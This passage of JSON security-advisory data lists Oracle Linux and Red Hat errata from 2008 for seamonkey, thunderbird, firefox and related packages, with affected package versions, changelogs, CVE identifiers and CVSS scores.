"packageFilename": "seamonkey-1.0.9-26.0.1.el4.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-js-debugger-1.0.9-26.0.1.el4.ia64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "i386", "packageFilename": "devhelp-devel-0.10-0.10.el4.i386.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-devel-1.0.9-26.0.1.el4.ia64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-mail-1.0.9-26.0.1.el4.ia64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-chat-1.0.9-26.0.1.el4.x86_64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-26.0.1.el4.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-26.0.1.el4.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-devel-1.0.9-26.0.1.el4.x86_64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-js-debugger-1.0.9-26.0.1.el4.x86_64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-chat-1.0.9-0.24.0.1.el3.x86_64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-1.0.9-0.24.0.1.el3.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "src", "packageFilename": "seamonkey-1.0.9-26.0.1.el4.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "src", "packageFilename": "seamonkey-1.0.9-26.0.1.el4.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "src", "packageFilename": "seamonkey-1.0.9-26.0.1.el4.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-26.0.1.el4.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-mail-1.0.9-0.24.0.1.el3.x86_64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-1.0.9-26.0.1.el4.ia64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-26.0.1.el4.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-devel-1.0.9-0.24.0.1.el3.x86_64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.0.1.el4.ia64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.0.1.el4.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.0.1.el3.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-mail-1.0.9-26.0.1.el4.x86_64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nspr-1.0.9-0.24.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "x86_64", "packageFilename": "devhelp-devel-0.10-0.10.el4.x86_64.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nss-1.0.9-0.24.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}], "description": "devhelp:\n[0.10-0.10.el4]\n- Rebuild against newer gecko\nseamonkey:\n[1.0.9-26.0.1.el4]\n- Added mozilla-oracle-default-prefs.js and mozilla-oracle-default-bookmarks.html.\n- Removed corresponding ones of Red Hat.\n[1.0.9-26.el4]\n- Add missing patches from 1.8.1.17\n[1.0.9-25.el4]\n- Add patches for backported fixes from 1.8.1.17", "edition": 3, "reporter": "Oracle", "published": "2008-09-24T00:00:00", "title": "seamonkey security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-09-24T00:00:00", "id": "ELSA-2008-0882", "href": "http://linux.oracle.com/errata/ELSA-2008-0882.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:49:15", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-16.0.1.el4", "arch": "ia64", "packageFilename": "thunderbird-1.5.0.12-16.0.1.el4.ia64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-16.0.1.el4", "arch": "i386", "packageFilename": "thunderbird-1.5.0.12-16.0.1.el4.i386.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-16.0.1.el4", "arch": "x86_64", "packageFilename": "thunderbird-1.5.0.12-16.0.1.el4.x86_64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-16.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-16.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-16.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-16.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-16.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-16.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}], "description": "[1.5.0.12-16.0.1.el4]\n- Add thunderbird-oracle-default-prefs.js for errata rebuild and remove\n thunderbird-redhat-default-prefs.js\n[1.5.0.12-16]\n- Update patchset to fix regression as per 1.8.1.17\n[1.5.0.12-15]\n- Rebuild with system nss and nspr\n[1.5.0.12-14]\n- Add patches for backported fixes from 1.8.1.16\n[1.5.0.12-13]\n- Respun for mozilla bugs #439035,#439735,#440308\n[1.5.0.12-12]\n- Update patchset to fix regression as per 1.8.1.15", "edition": 3, "reporter": "Oracle", "published": "2008-10-01T00:00:00", "title": "thunderbird security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-10-01T00:00:00", "id": "ELSA-2008-0908", "href": "http://linux.oracle.com/errata/ELSA-2008-0908.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:43:36", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.2-3.0.1.el5", "arch": "src", "packageFilename": "firefox-3.0.2-3.0.1.el5.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.2-3.0.1.el5", "arch": "src", "packageFilename": "firefox-3.0.2-3.0.1.el5.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "x86_64", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.x86_64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.2-5.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.0.2-5.0.1.el5.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.2-5.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.0.2-5.0.1.el5.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.2-3.0.1.el5", "arch": "i386", "packageFilename": "firefox-3.0.2-3.0.1.el5.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.2-3.0.1.el5", "arch": "i386", "packageFilename": "firefox-3.0.2-3.0.1.el5.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-devel-3.12.1.1-1.el5.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-devel-3.12.1.1-1.el5.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-3.12.1.1-1.el5.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-3.12.1.1-1.el5.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "src", "packageFilename": "yelp-2.16.0-21.el5.src.rpm", "packageName": "yelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "src", "packageFilename": "yelp-2.16.0-21.el5.src.rpm", "packageName": "yelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.2-5.0.1.el5", "arch": "src", "packageFilename": "xulrunner-1.9.0.2-5.0.1.el5.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.2-5.0.1.el5", "arch": "src", "packageFilename": "xulrunner-1.9.0.2-5.0.1.el5.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "i386", "packageFilename": "devhelp-0.12-19.el5.i386.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "i386", "packageFilename": "devhelp-0.12-19.el5.i386.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.2-3.0.1.el5", "arch": "x86_64", "packageFilename": "firefox-3.0.2-3.0.1.el5.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "x86_64", "packageFilename": "devhelp-devel-0.12-19.el5.x86_64.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "x86_64", "packageFilename": "nss-3.12.1.1-1.el5.x86_64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "i386", "packageFilename": "devhelp-devel-0.12-19.el5.i386.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "i386", "packageFilename": "devhelp-devel-0.12-19.el5.i386.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "x86_64", "packageFilename": "devhelp-0.12-19.el5.x86_64.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "src", "packageFilename": "devhelp-0.12-19.el5.src.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "src", "packageFilename": "devhelp-0.12-19.el5.src.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.2-5.0.1.el5", "arch": "x86_64", "packageFilename": "xulrunner-1.9.0.2-5.0.1.el5.x86_64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.2-5.0.1.el5", "arch": "x86_64", "packageFilename": "xulrunner-devel-1.9.0.2-5.0.1.el5.x86_64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "x86_64", "packageFilename": "nss-tools-3.12.1.1-1.el5.x86_64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.2-5.0.1.el5", "arch": "x86_64", "packageFilename": "xulrunner-devel-unstable-1.9.0.2-5.0.1.el5.x86_64.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "x86_64", "packageFilename": "nss-devel-3.12.1.1-1.el5.x86_64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.2-5.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-1.9.0.2-5.0.1.el5.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.2-5.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-1.9.0.2-5.0.1.el5.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "src", "packageFilename": "nss-3.12.1.1-1.el5.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "src", "packageFilename": "nss-3.12.1.1-1.el5.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "i386", "packageFilename": "yelp-2.16.0-21.el5.i386.rpm", "packageName": "yelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-tools-3.12.1.1-1.el5.i386.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.2-5.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-devel-unstable-1.9.0.2-5.0.1.el5.i386.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.i386.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.i386.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "x86_64", "packageFilename": "yelp-2.16.0-21.el5.x86_64.rpm", "packageName": "yelp", "operator": "lt"}], "description": "devhelp:\n[0.12-19]\n- Rebuild against xulrunner\nfirefox:\n[3.0.2-3.0.1.el5]\n- Added firefox-oracle-default-prefs.js/firefox-oracle-default-bookmarks.html\n- Removed the corresponding files of Red Hat.\n- Added patch oracle-firefox-branding.patch\n- Update firstrun URL\n[3.0.2-3]\n- Update to Firefox 3.0.2 build 6\n[3.0.2-2]\n- Update to Firefox 3.0.2 build 4\n[3.0.2-1]\n- Update to Firefox 3.0.2\n[3.0.1-2]\n- Fixed #447535 - RHEL 5.2 beta / upstream Firefox 3 beta 5\n autoConfig broken\n- Fixed #445304 - HTML/index.html always redirects to en-US/index.html\n parallel compiles and -debuginfo packages\nnss:\n[3.12.1.1-1]\n- Update to NSS_3_12_1_RC2\n[3.12.1.0-1]\n- Update to NSS_3_12_1_RC1\nxulrunner:\n[1.9.0.2-5.0.1]\n- Added xulrunner-oracle-default-prefs.js\n- Remove its corresponding of Red Hat.\n[1.9.0.2-5]\n- Update to 1.9.0.2 build 6\n[1.9.0.2-4]\n- Fixed firefox dependency (#445391)\n[1.9.0.2-3]\n- Update to 1.9.0.2 build 4\n[1.9.0.2-2]\n- Fixed gecko version\n[1.9.0.2-1]\n- Update to 1.9.0.2\n[1.9.0.1-2]\n- Updated provided gecko version\nyelp:\n[2.16.0-21]\n- rebuild against xulrunner", "edition": 3, "reporter": "Oracle", "published": "2008-09-24T00:00:00", "title": "firefox security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-4063", "CVE-2008-4067", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4064", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-09-24T00:00:00", "id": "ELSA-2008-0879", "href": "http://linux.oracle.com/errata/ELSA-2008-0879.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-03-15T06:37:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "i386", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.20.el2.i386.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390", "packageFilename": "seamonkey-devel-1.0.9-26.el4.s390.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390", "packageFilename": "seamonkey-1.0.9-0.24.el3.s390.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "ia64", "packageFilename": "seamonkey-nss-1.0.9-0.20.el2.ia64.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ia64", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.ia64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "x86_64", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.x86_64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ppc", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.ppc.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.s390.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ppc", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.ppc.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ppc", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.ppc.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ppc", "packageFilename": "seamonkey-1.0.9-26.el4.ppc.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.s390.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "x86_64", "packageFilename": "seamonkey-1.0.9-0.24.el3.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390x", "packageFilename": "seamonkey-1.0.9-0.24.el3.s390x.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "x86_64", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.x86_64.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390x", "packageFilename": "seamonkey-1.0.9-26.el4.s390x.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "ppc", "packageFilename": "devhelp-0.10-0.10.el4.ppc.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "i386", "packageFilename": "seamonkey-nss-devel-1.0.9-0.20.el2.i386.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ia64", "packageFilename": "seamonkey-devel-1.0.9-26.el4.ia64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ia64", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.ia64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ia64", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.ia64.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "ppc", "packageFilename": "devhelp-devel-0.10-0.10.el4.ppc.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-0.20.el2.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": 